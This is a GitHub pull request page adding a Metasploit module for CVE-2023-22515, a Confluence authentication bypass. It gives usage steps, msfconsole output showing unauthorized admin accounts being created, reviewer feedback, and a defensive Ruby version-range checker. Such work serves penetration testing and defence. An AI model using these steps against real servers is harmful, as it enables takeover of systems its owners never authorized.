
CVE-2023-22515 - Atlassian Confluence Data Center and Server Authentication Bypass #18447

Merged

Conversation

emirpolatt
Contributor

Description

This module exploits a Broken Access Control vulnerability in Atlassian Confluence servers that leads to Authentication Bypass.

A specially crafted request can create a new admin account without authorization on the Atlassian server.

Vulnerable Application

Affecting Atlassian Confluence from version 8.0.0 to before 8.3.3, from version 8.4.0 to before 8.4.3 and from version 8.5.0 to before 8.5.2.

Verification Steps

  • Set up a working installation of Atlassian Confluence Server before 8.0.0
  • Start msfconsole
  • use auxiliary/admin/http/atlassian_confluence_auth_bypass
  • set RHOST <IP>
  • set RPORT <PORT>
  • check
  • You should see The target is vulnerable
  • set NEW_USERNAME <username>
  • set NEW_PASSWORD <password>
  • run
  • You should get a new admin account.

Options

  • TARGETURI: Path to Atlassian Confluence installation ("/" is the default)
  • NEW_USERNAME: Username to be used when creating a new user with admin privileges.
  • NEW_PASSWORD: Password to be used when creating a new user with admin privileges.
  • NEW_EMAIL: E-mail to be used when creating a new user with admin privileges.

Scenarios

Tested on Confluence Server 8.0.0 with Linux target (Ubuntu 20.04)

msf6 > use auxiliary/multi/http/atlassian_confluence_auth_bypass
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set RHOSTS <YOUR_TARGET>
RHOSTS => <YOUR_TARGET>
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_USERNAME admin_1337
NEW_USERNAME => admin_1337
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > set NEW_PASSWORD admin_1337
NEW_PASSWORD => admin_1337
msf6 > auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against <YOUR_TARGET>

[+] Admin user was created successfully. Credentials: admin_1337 - admin_1337
[+] Now you can login as adminstrator from: http://<YOUR_TARGET>:8090/login.action
[*] Auxiliary module execution completed
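The affected ranges listed under Vulnerable Application are what a version-based check has to encode. The following Ruby is an added example written for this page, not the module's own `check` method or any Rapid7 code: it parses a version string, optionally lifted from a constructed banner line, and reports whether it falls inside the three ranges stated above. The banner format and the `version_from_banner` helper are assumptions for illustration; an asset inventory or a defender-side scanner would feed it the version it already knows.

```ruby
# Added example (not the Metasploit module's code): classify a Confluence
# version against the CVE-2023-22515 affected ranges stated in this PR:
#   8.0.0 <= v < 8.3.3, 8.4.0 <= v < 8.4.3, 8.5.0 <= v < 8.5.2
AFFECTED_RANGES = [
  [[8, 0, 0], [8, 3, 3]],
  [[8, 4, 0], [8, 4, 3]],
  [[8, 5, 0], [8, 5, 2]]
].freeze

# Turn "8.3.2" (or "8.3", treated as 8.3.0) into a comparable [major, minor, patch]
# triple. Returns nil when the string does not start with a dotted version.
def parse_version(str)
  m = str.to_s.strip.match(/\A(\d+)\.(\d+)(?:\.(\d+))?/)
  return nil unless m
  [m[1].to_i, m[2].to_i, (m[3] || 0).to_i]
end

# Extract a version from a constructed banner line such as
# "Atlassian Confluence 8.3.2" (assumed format, not the real server-info output).
def version_from_banner(text)
  m = text.to_s.match(/Confluence\s+(\d+(?:\.\d+)+)/)
  m && m[1]
end

# true  -> version is inside one of the affected ranges
# false -> version parses but is outside every range (e.g. fixed or older branch)
# nil   -> version could not be parsed; treat as "unknown", not "safe"
def affected_version?(str)
  v = parse_version(str)
  return nil if v.nil?
  # Array#<=> compares element by element, which is exactly semver ordering here.
  AFFECTED_RANGES.any? { |lo, hi| (v <=> lo) >= 0 && (v <=> hi) < 0 }
end

# Convenience wrapper for inventory output: returns a short status word.
def classify(str)
  case affected_version?(str)
  when true then 'affected'
  when false then 'not-affected'
  else 'unknown'
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, including the 8.3.2 build used in the PR test output.
  ['8.3.2', '8.3.3', '8.4.2', '8.5.2', '7.19.14', 'Atlassian Confluence 8.5.1'].each do |s|
    ver = version_from_banner(s) || s
    puts format('%-30s -> %s', s, classify(ver))
  end
end
```

Note that an unparseable version returns nil rather than false, so a reporting pipeline does not silently mark an unidentified host as patched.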

@smcintyre-r7 smcintyre-r7 self-assigned this Oct 11, 2023
@emirpolatt emirpolatt force-pushed the atlassian_confluence_bac_auth_bypass branch from 94994d8 to e48ead5 Compare October 13, 2023 09:13
@adfoster-r7
Contributor

@msjenkins-r7 retest this please

Contributor

@smcintyre-r7 smcintyre-r7 left a comment


I gave this a test and ran into a few issues with the #check method. The most important of which was a crash when nil was being returned. I left a few suggestions to address all the problems I noticed.

With those changes in place, everything appears to be working as intended. I tested it against Confluence 8.3.2 on a Windows target.

Contributor

@smcintyre-r7 smcintyre-r7 left a comment


Module looks good to me now, and the tests are showing that it's working as intended now.

Testing Output

In the following output, you'll see that the check method works and then the run method creates the account. When the module is run a second time, it fails because the user was already created. This is expected and reasonable behavior. You'll also see that even after the user creation fails, the check method continues to work, which was an issue previously because the setup steps had not been finished.

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > show options 

Module options (auxiliary/admin/http/atlassian_confluence_auth_bypass):

   Name          Current Setting     Required  Description
   ----          ---------------     --------  -----------
   NEW_EMAIL     [email protected]  yes       E-mail to be used when creating a new user with admin privileges
   NEW_PASSWORD  lzZjyRop            yes       Password to be used when creating a new user with admin privileges
   NEW_USERNAME  gearldine.feeney    yes       Username to be used when creating a new user with admin privileges
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.159.10      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8090                yes       The target port (TCP)
   SSL           false               no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                   yes       Base path
   VHOST                             no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against 192.168.159.10

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
[+] Found server-info.action! Trying to ignore setup.
[+] Admin user was created successfully. Credentials: gearldine.feeney - lzZjyRop
[+] Now you can login as administrator from: http://192.168.159.10:8090/login.action
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > run
[*] Running module against 192.168.159.10

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
[+] Found server-info.action! Trying to ignore setup.
[-] Auxiliary aborted due to failure: no-access: The admin user could not be created. Try a different username.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > check
[*] 192.168.159.10:8090 - The target appears to be vulnerable. Exploitable version of Confluence: 8.3.2
msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > creds
Credentials
===========

host            origin          service                          public            private   realm  private_type  JtR Format
----            ------          -------                          ------            -------   -----  ------------  ----------
192.168.159.10  192.168.159.10  8090/tcp (Atlassian Confluence)  gearldine.feeney  lzZjyRop         Password      

msf6 auxiliary(admin/http/atlassian_confluence_auth_bypass) > 

I made some changes in ee0e5b9 to tidy up the docs and fix an issue I noticed where the module would fail when the username contained a capital letter.

emirpolatt and others added 6 commits October 19, 2023 17:19
get_confluence_version inside to check method. Also new status messages
Implement changes proposed by Spencer McIntyre (smcintyre-r7)
The username can not contain capital letters, or the operation will
fail.
@smcintyre-r7 smcintyre-r7 force-pushed the atlassian_confluence_bac_auth_bypass branch from 8082004 to ee0e5b9 Compare October 19, 2023 21:20
@smcintyre-r7 smcintyre-r7 merged commit 15aaa90 into rapid7:master Oct 19, 2023
32 checks passed
@smcintyre-r7
Contributor

Release Notes

This adds an exploit for CVE-2023-22515 which is an authentication bypass within Atlassian Confluence that enables a remote attacker to create a new administrator account.

@cgranleese-r7 cgranleese-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 27, 2023